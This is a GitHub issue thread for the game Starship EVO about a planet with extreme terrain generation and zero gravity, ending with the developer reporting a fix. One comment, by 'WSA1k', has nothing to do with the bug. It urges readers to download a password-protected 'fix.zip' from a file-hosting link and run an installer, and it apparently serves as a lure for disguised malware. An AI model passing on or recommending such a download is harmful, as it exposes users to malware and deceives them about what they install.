### ISSUE TITLE
[Bug?] Planet with very extreme terrain generation

### ISSUE THREAD

**Issue by Asnro** [tsunamayo/Starship-EVO#5948]
### Short Description of the issue:

Found a planet with very extreme terrain generation. Curving tall spires, small floating islands, deep valleys. The whole planet looks like some kind of virus. Unsure if intentional.

### Steps to reproduce the issue:

Unknown, jumped at least 4 times in save file.

### Environment
- Starship EVO version: 23w34a
- Graphics Card: RTX 4090

### Additional information:

![kuva](https://github.com/user-attachments/assets/052bc806-82c0-4b59-aacf-cd3fd0ed5af9)

[Player.zip](https://github.com/user-attachments/files/16744939/Player.zip)

Please also include the `Player.log` file. You can find the log file here: `%UserProfile%\AppData\LocalLow\Moonfire Entertainment\Starship EVO\`

If you issue concerns a particular design please include any blueprint that could help to reproduce the issue.
Blueprint folder is over at:
`%UserProfile%\AppData\LocalLow\Moonfire Entertainment\Starship EVO\Save_Data\Blueprints\`
You will need to zip the folder to upload it. 
To do so Right click and choose [Send to -> compressed zip file] then drag the .zip onto your report to upload it.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tsunamayo** [comment]
@Asnro Hi, quite extreme indeed. In case like that dont hesitate to give me your character save at the position so I can have a look at it. Thanks!

**Comment by Asnro** [comment]
Hi, I'm not sure what files to upload for a character save. I tried to zip the save folder in AppData/LocalLow/(...)/Save_Data/Characters, but the file size is too big for GitHub. If that's the correct folder, how can I send it?

**Comment by Asnro** [comment]
Save file on Google Drive, hopefully it's correct:
https://drive.google.com/file/d/1t5zTByb8jWLOPykkpdpI0UxL7D1IUiHQ/view?usp=sharing

Another note: the planet has 0g gravity, which seems like another bug.

**Comment by Majikmonster** [comment]
This may be a bug, but I wouldn't mind a rare planet or two with this kind of exotic generation, or very low or nonexistent gravity. Anomalous planets/moons would make for some great tourist-y spots, interesting bases, and navigation/mining challenges.

**Comment by Asnro** [comment]
I agree, which is why I added the question mark to the tag in the title. Having planets like this spawn one-in-a-million would make cool easter eggs, but I found two planets like this within a 20ly radius of the starting system, which feels more like a bug than a rarity.

**Comment by tsunamayo** [comment]
@Asnro So the issue is fixed! Thanks for sending me those. The planet will still be quite extreme but on the reasonable size.
